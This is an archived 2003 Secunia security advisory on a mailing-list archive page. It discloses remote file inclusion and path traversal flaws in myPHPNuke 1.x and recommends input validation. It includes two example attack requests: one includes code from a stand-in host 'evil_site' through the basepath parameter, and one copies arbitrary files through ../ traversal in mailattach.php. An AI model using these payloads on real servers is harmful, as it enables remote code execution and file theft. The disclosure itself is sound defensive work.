NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Secunia Advisories> 2003-q3

[sec-adv] myPHPNuke Arbitrary File Inclusion Vulnerability

From: Secunia Security Advisories (sec-advsecunia.com)
Date: Fri Sep 12 2003 - 08:30:02 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

TITLE:
myPHPNuke Arbitrary File Inclusion Vulnerability

SECUNIA ADVISORY ID:
SA9721

VERIFY ADVISORY:
http://www.secunia.com/advisories/9721/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
myPHPNuke 1.x

DESCRIPTION:
Multiple vulnerabilities have been identified in myPHPNuke allowing
malicious people to include and execute arbitrary code.

One problem is that the script "Gallery/displayCategory.php" doesn't
verify the "basepath" and "adminpath" parameters before using them.
This allows malicious people to include arbitrary files from remote
servers.

Example:
Gallery/displayCategory.php?basepath=http://evil_site

The other problem is that the mail attach function doesn't verify
file names properly. This allows malicious users to include arbitrary
remote and local files.

Example copying "path_to/any_file" into "mail_me.txt" and attaching
it:
mailattach.php?submit=1&attach1=path_to/any_file&attach1_name=../mail_me.txt

The vulnerabilities have been reported in version 1.8.8_7.

SOLUTION:
Edit the souce code so that user input is properly verified before
being used.

REPORTED BY / CREDITS:
frog-mn

ORIGINAL ADVISORY:
http://www.phpsecure.info/v2/tutos/myPHPNuke.txt

----------------------------------------------------------------------

Secunia recommends that you verify all advisories you receive, by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.

Contact details:
Web : http://www.secunia.com/
E-mail : supportsecunia.com
Tel : +45 7020 5144
Fax : +45 7020 5145

----------------------------------------------------------------------

Unsubscribe: Secunia Security Advisories

----------------------------------------------------------------------

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]